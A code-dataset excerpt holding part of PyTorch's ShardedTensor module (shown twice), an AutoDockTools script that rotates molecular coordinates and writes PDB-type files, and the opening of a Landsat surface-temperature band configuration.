Raises an exception if ShardedTensor was created with ``init_rrefs=False``
"""
if not self._init_rrefs:
raise RuntimeError(
'ShardedTensor created with init_rrefs=False, no RRefs to remote shards available'
)
return self._remote_shards
def __hash__(self):
return id(self)
def __repr__(self):
return f'ShardedTensor({self._metadata})'
@dataclass
class ProcessGroupState:
"""
State for ser-de of process group
"""
local_rank: int
global_rank: int
local_world_size: int
global_world_size: int
def __getstate__(self):
pg_state = ShardedTensor.ProcessGroupState(
distributed_c10d.get_rank(self._process_group),
distributed_c10d.get_rank(),
distributed_c10d.get_world_size(self._process_group),
distributed_c10d.get_world_size(),
)
return self._local_shards, self._metadata, pg_state, self._sharding_spec, self._init_rrefs
def __setstate__(self, state):
self._sharded_tensor_id = None
if not distributed_c10d.is_initialized():
raise RuntimeError(
'Need to initialize default process group using '
'"init_process_group" before loading ShardedTensor')
self._local_shards, self._metadata, pg_state, self._sharding_spec, self._init_rrefs = state
# Setup process group
self._process_group = get_current_process_group()
# Validate process group.
local_rank = distributed_c10d.get_rank(self._process_group)
if pg_state.local_rank != local_rank:
raise RuntimeError(
f'Local rank at save time was {pg_state.local_rank}, but at '
f'load time was {local_rank}')
global_rank = distributed_c10d.get_rank()
if pg_state.global_rank != global_rank:
raise RuntimeError(
f'Global rank at save time was {pg_state.global_rank}, but at '
f'load time was {global_rank}')
local_world_size = distributed_c10d.get_world_size(self._process_group)
if pg_state.local_world_size != local_world_size:
raise RuntimeError(
f'Local world size at save time was {pg_state.local_world_size}, '
f'but at load time was {local_world_size}')
global_world_size = distributed_c10d.get_world_size()
if pg_state.global_world_size != global_world_size:
raise RuntimeError(
f'Global world size at save time was {pg_state.global_world_size}, '
f'but at load time was {global_world_size}')
self._post_init()
def _create_tensor_from_params(*size, local_device, tensor_init_params: TensorInitParams):
""" Helper to construct tensor from size, device and common params. """
create_op = tensor_init_params.create_op
dtype = tensor_init_params.tensor_properties.dtype
layout = tensor_init_params.tensor_properties.layout
requires_grad = tensor_init_params.tensor_properties.requires_grad
memory_format = tensor_init_params.tensor_properties.memory_format
pin_memory = tensor_init_params.tensor_properties.pin_memory
if create_op == CreateOp.ONES:
return torch.ones(*size, dtype=dtype, layout=layout,
device=local_device, pin_memory=pin_memory,
requires_grad=requires_grad,)
elif create_op == CreateOp.EMPTY:
return torch.empty(*size, dtype=dtype, layout=layout,
device=local_device, requires_grad=requires_grad,
# NB: memory_format param is not accepted by torch.ones
memory_format=memory_format, pin_memory=pin_memory,)
elif tensor_init_params.create_op == CreateOp.ZEROS:
return torch.zeros(*size,
dtype=dtype,
layout=layout,
device=local_device,
pin_memory=pin_memory,
requires_grad=requires_grad,)
elif tensor_init_params.create_op == CreateOp.RAND:
return torch.rand(*size,
dtype=dtype,
layout=layout,
device=local_device,
pin_memory=pin_memory,
requires_grad=requires_grad,)
elif tensor_init_params.create_op == CreateOp.FULL:
return torch.full(size=size,
fill_value=tensor_init_params.fill_value,
layout=layout,
dtype=dtype,
requires_grad=requires_grad,
device=local_device, )
else:
raise ValueError(f'Unsupported create_op: {tensor_init_params.create_op}')
| 40.637931
| 126
| 0.649163
|
from dataclasses import dataclass, field
from enum import Enum
from typing import (
Callable,
Dict,
List,
Optional,
Union
)
import weakref
import threading
import torch
import torch.distributed as dist
from torch.distributed import rpc
from torch.distributed import distributed_c10d
from torch.distributed._sharding_spec import (
ChunkShardingSpec,
EnumerableShardingSpec,
ShardMetadata,
ShardingSpec,
)
from torch.distributed._sharding_spec._internals import (
check_tensor,
get_split_size,
get_chunked_dim_size,
validate_non_overlapping_shards_metadata,
)
from torch.types import Number
from .metadata import TensorProperties, ShardedTensorMetadata
from .shard import Shard
from .utils import (
get_current_process_group,
_flatten_tensor_size,
_parse_and_validate_remote_device,
_validate_output_tensor_for_gather,
build_metadata_from_local_shards,
build_global_metadata
)
_sharded_tensor_lock = threading.Lock()
_sharded_tensor_current_id = 0
_sharded_tensor_map: Dict[int, 'weakref.ReferenceType[ShardedTensor]'] = {}
_SHARDED_OPS: Dict[str, Callable] = {}
def _register_sharded_op(op, func):
from inspect import signature
if len(signature(func).parameters) != 4:
raise TypeError(
f'Custom sharded op function expects signature: '
f'(types, args, kwargs, process_group), but received '
f'signature: {signature(func)}')
global _SHARDED_OPS
_SHARDED_OPS[op] = func
def _register_remote_shards(sharded_tensor_id: int, rrefs: List[rpc.RRef[Shard]], rpc_rank: int):
with _sharded_tensor_lock:
if sharded_tensor_id not in _sharded_tensor_map:
raise RuntimeError(
f'Could not find sharded_tensor_id: {sharded_tensor_id} in map: {_sharded_tensor_map.keys()}')
sharded_tensor = _sharded_tensor_map[sharded_tensor_id]()
if sharded_tensor is None:
raise RuntimeError('ShardedTensor weakref has been deallocated')
else:
sharded_tensor._register_remote_shards(rrefs, rpc_rank)
class CreateOp(Enum):
EMPTY = 0
FULL = 1
ONES = 2
RAND = 3
ZEROS = 4
@dataclass
class TensorInitParams(object):
create_op: CreateOp
fill_value: Number = field(default=False)
tensor_properties: TensorProperties = field(
default=TensorProperties(dtype=torch.get_default_dtype(),
layout=torch.strided,
requires_grad=False,
memory_format=torch.contiguous_format,
pin_memory=False))
class ShardedTensor(object):
def __new__(cls, *args, **kwargs):
torch._C._log_api_usage_once("torch.distributed.sharded_tensor")
return super(ShardedTensor, cls).__new__(cls)
def __init__(
self,
sharding_spec: ShardingSpec,
*size,
tensor_init_params: TensorInitParams,
process_group=None,
init_rrefs=False,
):
self._prepare_init(process_group=process_group, init_rrefs=init_rrefs)
if tensor_init_params.tensor_properties is None:
raise ValueError('tensor_properties must not be None.')
if tensor_init_params.tensor_properties.dtype is None:
tensor_init_params.tensor_properties.dtype = torch.get_default_dtype()
if tensor_init_params.tensor_properties.layout != torch.strided:
raise ValueError('Only torch.strided layout is currently supported')
if tensor_init_params.tensor_properties.memory_format != torch.contiguous_format:
raise ValueError('Only torch.contiguous_format memory_format is currently supported')
dims = _flatten_tensor_size(size)
self._sharding_spec = sharding_spec
if isinstance(self._sharding_spec, ChunkShardingSpec):
self._init_chunked(dims, tensor_init_params)
elif isinstance(self._sharding_spec, EnumerableShardingSpec):
self._init_enumerable(dims, tensor_init_params)
else:
raise ValueError(f'Unsupported sharding_spec: {self._sharding_spec}')
self._post_init()
def _prepare_init(self, process_group=None, init_rrefs=False):
self._init_rrefs = init_rrefs
self._sharded_tensor_id = None
self._process_group = (
process_group
if process_group is not None
else distributed_c10d._get_default_group()
)
self._local_shards: List[Shard] = []
self._remote_shards: Dict[int, List[rpc.RRef[Shard]]] = {}
def _post_init(self):
if self._init_rrefs:
with _sharded_tensor_lock:
global _sharded_tensor_current_id, _sharded_tensor_map
self._sharded_tensor_id = _sharded_tensor_current_id
_sharded_tensor_map[self._sharded_tensor_id] = weakref.ref(self)
_sharded_tensor_current_id += 1
if not rpc._is_current_rpc_agent_set():
raise RuntimeError(
'RPC Framework needs to be initialized using'
' torch.distributed.rpc.init_rpc if init_rrefs is set to True')
self._init_rpc()
def __del__(self):
with _sharded_tensor_lock:
global _sharded_tensor_current_id, _sharded_tensor_map
if self._sharded_tensor_id in _sharded_tensor_map:
_sharded_tensor_map.pop(self._sharded_tensor_id)
def _init_rpc(self):
pg_rank = dist.get_rank()
rpc_rank = rpc.get_worker_info().id
if pg_rank != rpc_rank:
raise ValueError(
f'Default ProcessGroup and RPC ranks must be '
f'the same for ShardedTensor, found process group rank: '
f'{pg_rank} and RPC rank: {rpc_rank}'
)
self._remote_shards = {}
worker_infos = rpc._get_current_rpc_agent().get_worker_infos()
rank_to_name = {}
name_to_rank = {}
for worker_info in worker_infos:
rank_to_name[worker_info.id] = worker_info.name
name_to_rank[worker_info.name] = worker_info.id
all_tensor_ids = rpc.api._all_gather(self._sharded_tensor_id)
futs = []
rpc_rank = rpc.get_worker_info().id
for rank in range(dist.get_world_size()):
if rank == dist.get_rank():
continue
if len(self.local_shards()) != 0:
rrefs: List[rpc.RRef[Shard]] = [rpc.RRef(shard) for shard in self.local_shards()]
fut = rpc.rpc_async(
rank,
_register_remote_shards,
args=(all_tensor_ids[rank_to_name[rank]], rrefs, rpc_rank))
futs.append(fut)
torch.futures.wait_all(futs)
rpc.api._all_gather(None)
def gather(
self,
dst: int = 0,
out: Optional[torch.Tensor] = None,
) -> None:
rank = dist.get_rank(self._process_group)
full_size = self.metadata().size
_validate_output_tensor_for_gather(rank, dst, full_size, out)
local_shards = self.local_shards()
world_size = dist.get_world_size(self._process_group)
gathered_shards = [None] * world_size
dist.all_gather_object(
obj=local_shards,
object_list=gathered_shards,
group=self._process_group,
)
if rank == dst:
dims = len(full_size)
for shards in gathered_shards:
if shards is None:
raise RuntimeError(
f'Gathered shards cannot be None on dst rank {dst}'
)
for shard in shards:
metadata = shard.metadata
tensor = shard.tensor
out_narrow_view = out
for dim in range(dims):
out_narrow_view = out_narrow_view.narrow(
dim,
metadata.shard_offsets[dim],
metadata.shard_sizes[dim],
)
out_narrow_view.copy_(tensor)
@classmethod
def _init_from_local_shards(
cls,
local_shards: List[Shard],
*global_size,
process_group=None,
init_rrefs=False,
):
process_group = (
process_group
if process_group is not None
else distributed_c10d._get_default_group()
)
current_rank = dist.get_rank(process_group)
world_size = dist.get_world_size(process_group)
local_sharded_tensor_metadata: Optional[ShardedTensorMetadata] = None
global_tensor_size = _flatten_tensor_size(global_size)
if len(local_shards) > 0:
local_sharded_tensor_metadata = \
build_metadata_from_local_shards(local_shards, global_tensor_size, current_rank, process_group)
gathered_metadatas: List[Optional[ShardedTensorMetadata]] = []
if world_size > 1:
gathered_metadatas = [None for _ in range(world_size)]
dist.all_gather_object(
gathered_metadatas,
local_sharded_tensor_metadata,
group=process_group
)
else:
gathered_metadatas = [local_sharded_tensor_metadata]
global_sharded_tensor_metadata = build_global_metadata(gathered_metadatas)
sharded_tensor = cls.__new__(cls)
sharded_tensor._prepare_init(process_group=process_group, init_rrefs=init_rrefs)
sharded_tensor._metadata = global_sharded_tensor_metadata
sharded_tensor._local_shards = local_shards
sharded_tensor._sharding_spec = EnumerableShardingSpec(global_sharded_tensor_metadata.shards_metadata)
sharded_tensor._post_init()
return sharded_tensor
@classmethod
def _init_from_local_shards_and_global_metadata(
cls,
local_shards: List[Shard],
sharded_tensor_metadata: ShardedTensorMetadata,
process_group=None,
init_rrefs=False,
) -> "ShardedTensor":
process_group = (
process_group
if process_group is not None
else distributed_c10d._get_default_group()
)
current_rank = dist.get_rank(process_group)
shards_metadata = sharded_tensor_metadata.shards_metadata
tensor_properties = sharded_tensor_metadata.tensor_properties
if len(shards_metadata) == 0:
raise ValueError("shards_metadata must not be empty!")
if tensor_properties.layout != torch.strided:
raise ValueError('Only torch.strided layout is currently supported')
sharded_tensor = cls.__new__(cls)
sharded_tensor._prepare_init(process_group=process_group, init_rrefs=init_rrefs)
sharded_tensor._metadata = sharded_tensor_metadata
local_shard_metadatas = []
def _raise_if_mismatch(expected, actual, prop_name, rank, is_property=False):
tensor_property_or_metadata = "tensor property" if is_property else "local ShardMetadata"
if expected != actual:
raise ValueError(f"Local shards' tensor {prop_name} property is incompatible with "
f"{tensor_property_or_metadata} on rank {rank}: "
f"{tensor_property_or_metadata} {prop_name}={expected}, "
f"local shard tensor {prop_name}={actual}.")
# collect local shard metadatas from the global sharded_tensor_metadata
for shard_metadata in shards_metadata: # type: ignore[attr-defined]
rank, local_device = _parse_and_validate_remote_device(sharded_tensor._process_group, shard_metadata.placement)
if current_rank == rank:
local_shard_metadatas.append(shard_metadata)
if len(local_shards) != len(local_shard_metadatas):
raise RuntimeError(
f'Number of local shards ({len(local_shards)}) does not match number of local '
f'shards metadata in sharded_tensor_metadata ({len(local_shard_metadatas)}) '
f'on rank ({current_rank}) '
)
for shard in local_shards:
shard_meta = shard.metadata
local_shard_tensor = shard.tensor
rank, local_device = _parse_and_validate_remote_device(sharded_tensor._process_group, shard_meta.placement)
# validate if shard_meta in the metadatas collected from sharded_tensor_metadata
assert shard_meta in local_shard_metadatas, \
"local shard metadata not in sharded_tensor_metadata!"
_raise_if_mismatch(tensor_properties.layout, local_shard_tensor.layout, "layout", current_rank, True)
if not local_shard_tensor.is_contiguous():
raise ValueError('Only torch.contiguous_format memory_format is currently supported')
_raise_if_mismatch(shard_meta.shard_sizes, list(local_shard_tensor.size()), "size", current_rank)
_raise_if_mismatch(tensor_properties.pin_memory, local_shard_tensor.is_pinned(), "pin_memory", current_rank, True)
_raise_if_mismatch(local_device, local_shard_tensor.device, "device", current_rank)
_raise_if_mismatch(tensor_properties.dtype, local_shard_tensor.dtype, "dtype", current_rank, True)
_raise_if_mismatch(
tensor_properties.requires_grad, local_shard_tensor.requires_grad, "requires_grad", current_rank, True)
# check if shards_metadata contains overlapping shards
validate_non_overlapping_shards_metadata(shards_metadata)
# check if the shards_metadata is compatible with overall size of the sharded tensor.
check_tensor(shards_metadata, list(sharded_tensor_metadata.size))
# done validation, add local_shards
sharded_tensor._local_shards = local_shards
# make an EnumerableShardingSpec for sharded tensors that are initialized from this API.
# TODO: make sharding spec a ChunkShardingSpec by inferring from the metadata list.
# see issue https://github.com/pytorch/pytorch/issues/67244
sharded_tensor._sharding_spec = EnumerableShardingSpec(shards_metadata)
# run post initialization, i.e. map registration, rpc initialization
sharded_tensor._post_init()
return sharded_tensor
def _init_chunked(self, dims, tensor_init_params: TensorInitParams, ):
current_rank = dist.get_rank(self._process_group)
sharding_dim = self._sharding_spec.dim # type: ignore[attr-defined]
# Validate the sharding spec.
if not isinstance(sharding_dim, int):
raise ValueError(
f"Sharding dim needs to be an integer, found: {sharding_dim}"
)
if sharding_dim >= len(dims) or sharding_dim < -len(dims):
raise ValueError(f"Invalid sharding dim: {sharding_dim}")
dim_size = dims[sharding_dim]
remote_devices = self._sharding_spec.placements # type: ignore[attr-defined]
chunks = len(remote_devices)
# split_size computed similar to 'torch.chunk'
split_size = get_split_size(dim_size, chunks)
shards_metadata = []
for idx, remote_device in enumerate(remote_devices):
rank, local_device = _parse_and_validate_remote_device(self._process_group, remote_device)
# Adjust the sharding dim for this rank.
sharded_dim_size = get_chunked_dim_size(dim_size, split_size, idx)
if sharded_dim_size > 0:
# Build sharding_metadata.
# deepcopy for modification.
rank_dims = dims.copy()
rank_offsets = [0] * len(dims)
rank_offsets[sharding_dim] = split_size * idx
rank_dims[sharding_dim] = sharded_dim_size
shard_metadata = ShardMetadata(rank_offsets, rank_dims, remote_device)
shards_metadata.append(shard_metadata)
# Build the local shard for the current rank if it is involved in the sharding spec.
if current_rank == rank:
# Initialize the local shard.
local_shard = _create_tensor_from_params(
*rank_dims, local_device=local_device, tensor_init_params=tensor_init_params)
self._local_shards.append(Shard(local_shard, shard_metadata))
# Build overall metadata
self._metadata = ShardedTensorMetadata(
shards_metadata, dims, tensor_init_params.tensor_properties, )
def _init_enumerable(self, dims, tensor_init_params: TensorInitParams):
# Validate the sharding spec is compatible with the tensor.
check_tensor(self._sharding_spec.shards, dims) # type: ignore[attr-defined]
current_rank = dist.get_rank(self._process_group)
shards_metadata = []
for shard_metadata in self._sharding_spec.shards: # type: ignore[attr-defined]
rank, local_device = _parse_and_validate_remote_device(self._process_group, shard_metadata.placement)
shards_metadata.append(shard_metadata)
if current_rank == rank:
# Initialize the local shard.
local_shard = _create_tensor_from_params(
*shard_metadata.shard_sizes, local_device=local_device,
tensor_init_params=tensor_init_params)
self._local_shards.append(Shard(local_shard, shard_metadata))
# Build overall metadata
self._metadata = ShardedTensorMetadata(
shards_metadata, dims, tensor_init_params.tensor_properties, )
def sharding_spec(self) -> ShardingSpec:
return self._sharding_spec
def __torch_function__(self, func, types, args=(), kwargs=None):
if func in _SHARDED_OPS:
return _SHARDED_OPS[func](types, args, kwargs, self._process_group)
raise RuntimeError(
f"torch function '{func.__name__}', with args: {args} and "
f"kwargs: {kwargs} not supported for ShardedTensor!")
def metadata(self) -> ShardedTensorMetadata:
return self._metadata
def local_shards(self) -> List[Shard]:
return self._local_shards
def size(self, dim: int = None) -> Union[torch.Size, int]:
size = self._metadata.size
if dim is None:
return size
if dim < 0 or dim >= len(size):
raise ValueError(
f"Argument ``dim`` must be within the range of tensor dimensions [0, {len(size)})"
)
return size[dim]
def is_pinned(self) -> bool:
return self._metadata.tensor_properties.pin_memory
def is_contiguous(self) -> bool:
return self._metadata.tensor_properties.memory_format == torch.contiguous_format
@property
def shape(self):
return self._metadata.size
@property
def requires_grad(self):
return self._metadata.tensor_properties.requires_grad
@property
def dtype(self):
return self._metadata.tensor_properties.dtype
@property
def layout(self):
return self._metadata.tensor_properties.layout
def _register_remote_shards(self, remote_shards: List[rpc.RRef[Shard]], rpc_rank: int):
self._remote_shards[rpc_rank] = remote_shards
def remote_shards(self) -> Dict[int, List[rpc.RRef[Shard]]]:
if not self._init_rrefs:
raise RuntimeError(
'ShardedTensor created with init_rrefs=False, no RRefs to remote shards available'
)
return self._remote_shards
def __hash__(self):
return id(self)
def __repr__(self):
return f'ShardedTensor({self._metadata})'
@dataclass
class ProcessGroupState:
local_rank: int
global_rank: int
local_world_size: int
global_world_size: int
def __getstate__(self):
pg_state = ShardedTensor.ProcessGroupState(
distributed_c10d.get_rank(self._process_group),
distributed_c10d.get_rank(),
distributed_c10d.get_world_size(self._process_group),
distributed_c10d.get_world_size(),
)
return self._local_shards, self._metadata, pg_state, self._sharding_spec, self._init_rrefs
def __setstate__(self, state):
self._sharded_tensor_id = None
if not distributed_c10d.is_initialized():
raise RuntimeError(
'Need to initialize default process group using '
'"init_process_group" before loading ShardedTensor')
self._local_shards, self._metadata, pg_state, self._sharding_spec, self._init_rrefs = state
# Setup process group
self._process_group = get_current_process_group()
# Validate process group.
local_rank = distributed_c10d.get_rank(self._process_group)
if pg_state.local_rank != local_rank:
raise RuntimeError(
f'Local rank at save time was {pg_state.local_rank}, but at '
f'load time was {local_rank}')
global_rank = distributed_c10d.get_rank()
if pg_state.global_rank != global_rank:
raise RuntimeError(
f'Global rank at save time was {pg_state.global_rank}, but at '
f'load time was {global_rank}')
local_world_size = distributed_c10d.get_world_size(self._process_group)
if pg_state.local_world_size != local_world_size:
raise RuntimeError(
f'Local world size at save time was {pg_state.local_world_size}, '
f'but at load time was {local_world_size}')
global_world_size = distributed_c10d.get_world_size()
if pg_state.global_world_size != global_world_size:
raise RuntimeError(
f'Global world size at save time was {pg_state.global_world_size}, '
f'but at load time was {global_world_size}')
self._post_init()
def _create_tensor_from_params(*size, local_device, tensor_init_params: TensorInitParams):
create_op = tensor_init_params.create_op
dtype = tensor_init_params.tensor_properties.dtype
layout = tensor_init_params.tensor_properties.layout
requires_grad = tensor_init_params.tensor_properties.requires_grad
memory_format = tensor_init_params.tensor_properties.memory_format
pin_memory = tensor_init_params.tensor_properties.pin_memory
if create_op == CreateOp.ONES:
return torch.ones(*size, dtype=dtype, layout=layout,
device=local_device, pin_memory=pin_memory,
requires_grad=requires_grad,)
elif create_op == CreateOp.EMPTY:
return torch.empty(*size, dtype=dtype, layout=layout,
device=local_device, requires_grad=requires_grad,
# NB: memory_format param is not accepted by torch.ones
memory_format=memory_format, pin_memory=pin_memory,)
elif tensor_init_params.create_op == CreateOp.ZEROS:
return torch.zeros(*size,
dtype=dtype,
layout=layout,
device=local_device,
pin_memory=pin_memory,
requires_grad=requires_grad,)
elif tensor_init_params.create_op == CreateOp.RAND:
return torch.rand(*size,
dtype=dtype,
layout=layout,
device=local_device,
pin_memory=pin_memory,
requires_grad=requires_grad,)
elif tensor_init_params.create_op == CreateOp.FULL:
return torch.full(size=size,
fill_value=tensor_init_params.fill_value,
layout=layout,
dtype=dtype,
requires_grad=requires_grad,
device=local_device, )
else:
raise ValueError(f'Unsupported create_op: {tensor_init_params.create_op}')
| true
| true
|
790b18f3fdca6c5f67de99d45ef9ca4dc84801f2
| 5,544
|
py
|
Python
|
mscreen/autodocktools_prepare_py3k/AutoDockTools/Utilities24/rotate_molecule.py
|
e-mayo/mscreen
|
a50f0b2f7104007c730baa51b4ec65c891008c47
|
[
"MIT"
] | 9
|
2021-03-06T04:24:28.000Z
|
2022-01-03T09:53:07.000Z
|
AutoDockTools/Utilities24/rotate_molecule.py
|
e-mayo/autodocktools-prepare-py3k
|
2dd2316837bcb7c19384294443b2855e5ccd3e01
|
[
"BSD-3-Clause"
] | 3
|
2021-03-07T05:37:16.000Z
|
2021-09-19T15:06:54.000Z
|
AutoDockTools/Utilities24/rotate_molecule.py
|
e-mayo/autodocktools-prepare-py3k
|
2dd2316837bcb7c19384294443b2855e5ccd3e01
|
[
"BSD-3-Clause"
] | 4
|
2019-08-28T23:11:39.000Z
|
2021-11-27T08:43:36.000Z
|
#!/usr/bin/env python
#$Id: rotate_molecule.py,v 1.2.10.1 2016/02/11 09:24:08 annao Exp $
import os
from MolKit import Read
from MolKit.pdbWriter import PdbWriter, PdbqsWriter, PdbqWriter, PdbqtWriter
from mglutil.math.rotax import rotax
import numpy
if __name__ == '__main__':
import sys
import getopt
def usage():
"Print helpful, accurate usage statement to stdout."
print("Usage: rotate_molecule.py -f filename")
print()
print(" Description of command...")
print(" [-f] filename")
print(" Optional parameters:")
print(" [-o] alternative output filename")
print(" (default is 'rotated_' +filename)")
print(" [-y] rotate around the y axis")
print(" (default is rotation around the z axis)")
print(" [-x] rotate around the x axis")
print(" (default is rotation around the z axis)")
print(" [-u] user-defined axis of rotation '1.0,2.0,-6.2'")
print(" (default is rotation around the z axis)")
print(" [-a] angle for rotation about axis ")
print(" (default is rotation around the z axis)")
print(" [-v] verbose output")
# process command arguments
try:
opt_list, args = getopt.getopt(sys.argv[1:], 'f:o:xyu:a:v')
except getopt.GetoptError as msg:
print('rotate_molecule.py: %s' %msg)
usage()
sys.exit(2)
# initialize required parameters
#-f: pdb_filename_stem
filename = None
# optional parameters
verbose = None
outputfilename = None
rotation = 'z'
#arbitrary axis angle for rotation
axis = None
angle = None
#'f:o:v'
for o, a in opt_list:
print("o=", o, " a=",a)
if o in ('-f', '--f'):
filename = a
if verbose: print('set filename to ', filename)
outputfilename = 'rotated_' + filename
if o in ('-o', '--o'):
outputfilename = a
if verbose:
print('set output outputfilename to ', a)
if o in ('-x', '--x'):
rotation = 'x'
if verbose: print('set rotation to ', rotation)
if o in ('-y', '--y'):
rotation = 'y'
if verbose: print('set rotation to ', rotation)
if o in ('-u', '--u'):
axis = a
if verbose: print('set user-defined axis to ', axis)
if o in ('-a', '--a'):
angle = a
if verbose: print('set angle for rotation to ', angle)
if o in ('-v', '--v'):
verbose = True
if verbose: print('set verbose to ', True)
if o in ('-h', '--'):
usage()
sys.exit()
if not filename:
print('rotate_molecule: filename must be specified.')
usage()
sys.exit()
mol = Read(filename)[0]
if verbose: print('read ', filename)
filetype = os.path.splitext(os.path.basename(filename))[1]
if verbose: print("filetype=", filetype)
writer = None
if filetype=='.pdbqt':
writer = PdbqtWriter()
elif filetype=='.pdbq':
writer = PdbqWriter()
elif filetype=='.pdbqs':
writer = PdbqsWriter()
elif filetype=='.pdb':
writer = PdbWriter()
else:
print('Sorry! Unable to write this filetype->', filetype)
center = numpy.add.reduce(mol.allAtoms.coords)/len(mol.allAtoms)
crds = numpy.array(mol.allAtoms.coords)
center = numpy.add.reduce(crds)/len(mol.allAtoms)
crds = crds - center
crds = crds.tolist()
mol.allAtoms.updateCoords(crds)
lenCoords = len(crds)
#rotate the atoms here
if axis is not None and angle is not None:
rot = (float(angle)* 3.14159/180.)%(2 * numpy.pi)
x = numpy.array([0.,0.,0.])
y = numpy.array(list(map(float,axis.split(','))))
matrix = rotax(x,y, rot)
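#rotax returns a 4x4 homogeneous transform, so a column of ones is appended to the
#Nx3 coordinates below to form Nx4 homogeneous coordinates before multiplying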
_ones = numpy.ones(lenCoords, 'f')
_ones.shape = (lenCoords,1)
mov_coords = numpy.concatenate((crds, _ones),1)
newcoords = numpy.dot(mov_coords, matrix)
nc = newcoords[:,:3].astype('f')
for i in range(lenCoords):
mol.allAtoms[i]._coords[0] = nc[i].tolist()
else:
if rotation=='z':
#for rotation around z-axis:
for a in mol.allAtoms:
a._coords[0][0] = -1.*a._coords[0][0]
a._coords[0][1] = -1.*a._coords[0][1]
elif rotation=='y':
#for rotation around y-axis:
for a in mol.allAtoms:
a._coords[0][0] = -1.*a._coords[0][0]
a._coords[0][2] = -1.*a._coords[0][2]
elif rotation=='x':
#for rotation around x-axis:
for a in mol.allAtoms:
a._coords[0][1] = -1.*a._coords[0][1]
a._coords[0][2] = -1.*a._coords[0][2]
ncrds = numpy.array(mol.allAtoms.coords)
ncrds = ncrds + center
ncrds = ncrds.tolist()
mol.allAtoms.updateCoords(ncrds)
if writer:
outptr = open(outputfilename, 'w')
liglines = mol.parser.allLines
ctr = 0
for l in liglines:
if l.find("ATOM")!=0 and l.find("HETATM")!=0:
outptr.write(l)
else:
writer.write_atom(outptr, mol.allAtoms[ctr])
ctr += 1
outptr.close()
# To execute this command type:
# rotate_molecule.py -f filename [-o outputfilename -u axis -a angle to rotate] -v
| 33.6
| 82
| 0.537879
|
import os
from MolKit import Read
from MolKit.pdbWriter import PdbWriter, PdbqsWriter, PdbqWriter, PdbqtWriter
from mglutil.math.rotax import rotax
import numpy
if __name__ == '__main__':
import sys
import getopt
def usage():
print("Usage: rotate_molecule.py -f filename")
print()
print(" Description of command...")
print(" [-f] filename")
print(" Optional parameters:")
print(" [-o] alternative output filename")
print(" (default is 'rotated_' +filename)")
print(" [-y] rotate around the y axis")
print(" (default is rotation around the z axis)")
print(" [-x] rotate around the x axis")
print(" (default is rotation around the z axis)")
print(" [-u] user-defined axis of rotation '1.0,2.0,-6.2'")
print(" (default is rotation around the z axis)")
print(" [-a] angle for rotation about axis ")
print(" (default is rotation around the z axis)")
print(" [-v] verbose output")
try:
opt_list, args = getopt.getopt(sys.argv[1:], 'f:o:xyu:a:v')
except getopt.GetoptError as msg:
print('rotate_molecule.py: %s' %msg)
usage()
sys.exit(2)
filename = None
verbose = None
outputfilename = None
rotation = 'z'
axis = None
angle = None
for o, a in opt_list:
print("o=", o, " a=",a)
if o in ('-f', '--f'):
filename = a
if verbose: print('set filename to ', filename)
outputfilename = 'rotated_' + filename
if o in ('-o', '--o'):
outputfilename = a
if verbose:
print('set output outputfilename to ', a)
if o in ('-x', '--x'):
rotation = 'x'
if verbose: print('set rotation to ', rotation)
if o in ('-y', '--y'):
rotation = 'y'
if verbose: print('set rotation to ', rotation)
if o in ('-u', '--u'):
axis = a
if verbose: print('set user-defined axis to ', axis)
if o in ('-a', '--a'):
angle = a
if verbose: print('set angle for rotation to ', angle)
if o in ('-v', '--v'):
verbose = True
if verbose: print('set verbose to ', True)
if o in ('-h', '--'):
usage()
sys.exit()
if not filename:
print('rotate_molecule: filename must be specified.')
usage()
sys.exit()
mol = Read(filename)[0]
if verbose: print('read ', filename)
filetype = os.path.splitext(os.path.basename(filename))[1]
if verbose: print("filetype=", filetype)
writer = None
if filetype=='.pdbqt':
writer = PdbqtWriter()
elif filetype=='.pdbq':
writer = PdbqWriter()
elif filetype=='.pdbqs':
writer = PdbqsWriter()
elif filetype=='.pdb':
writer = PdbWriter()
else:
print('Sorry! Unable to write this filetype->', filetype)
center = numpy.add.reduce(mol.allAtoms.coords)/len(mol.allAtoms)
crds = numpy.array(mol.allAtoms.coords)
center = numpy.add.reduce(crds)/len(mol.allAtoms)
crds = crds - center
crds = crds.tolist()
mol.allAtoms.updateCoords(crds)
lenCoords = len(crds)
if axis is not None and angle is not None:
rot = (float(angle)* 3.14159/180.)%(2 * numpy.pi)
x = numpy.array([0.,0.,0.])
y = numpy.array(list(map(float,axis.split(','))))
matrix = rotax(x,y, rot)
_ones = numpy.ones(lenCoords, 'f')
_ones.shape = (lenCoords,1)
mov_coords = numpy.concatenate((crds, _ones),1)
newcoords = numpy.dot(mov_coords, matrix)
nc = newcoords[:,:3].astype('f')
for i in range(lenCoords):
mol.allAtoms[i]._coords[0] = nc[i].tolist()
else:
if rotation=='z':
for a in mol.allAtoms:
a._coords[0][0] = -1.*a._coords[0][0]
a._coords[0][1] = -1.*a._coords[0][1]
elif rotation=='y':
for a in mol.allAtoms:
a._coords[0][0] = -1.*a._coords[0][0]
a._coords[0][2] = -1.*a._coords[0][2]
elif rotation=='x':
for a in mol.allAtoms:
a._coords[0][1] = -1.*a._coords[0][1]
a._coords[0][2] = -1.*a._coords[0][2]
ncrds = numpy.array(mol.allAtoms.coords)
ncrds = ncrds + center
ncrds = ncrds.tolist()
mol.allAtoms.updateCoords(ncrds)
if writer:
outptr = open(outputfilename, 'w')
liglines = mol.parser.allLines
ctr = 0
for l in liglines:
if l.find("ATOM")!=0 and l.find("HETATM")!=0:
outptr.write(l)
else:
writer.write_atom(outptr, mol.allAtoms[ctr])
ctr += 1
outptr.close()
| true
| true
|
790b18f6734a0e743f09e074c7c58ce541977cf8
| 10,660
|
py
|
Python
|
services/ows_refactored/surface_temperature/ows_lsc2_st_cfg.py
|
FlexiGroBots-H2020/datacube-config
|
8d6c61cf7c9a68552176aeb4aabc7ac6c3fc5a91
|
[
"Apache-2.0"
] | null | null | null |
services/ows_refactored/surface_temperature/ows_lsc2_st_cfg.py
|
FlexiGroBots-H2020/datacube-config
|
8d6c61cf7c9a68552176aeb4aabc7ac6c3fc5a91
|
[
"Apache-2.0"
] | null | null | null |
services/ows_refactored/surface_temperature/ows_lsc2_st_cfg.py
|
FlexiGroBots-H2020/datacube-config
|
8d6c61cf7c9a68552176aeb4aabc7ac6c3fc5a91
|
[
"Apache-2.0"
] | null | null | null |
from ows_refactored.common.ows_reslim_cfg import reslim_landsat
bands_ls5_st = {
"ST_B6": ["st"],
"ST_QA": ["st_qa"],
"QA_PIXEL": ["pq"]
}
bands_ls7_st = {
"ST_B6": ["st"],
"ST_QA": ["st_qa"],
"QA_PIXEL": ["pq"]
}
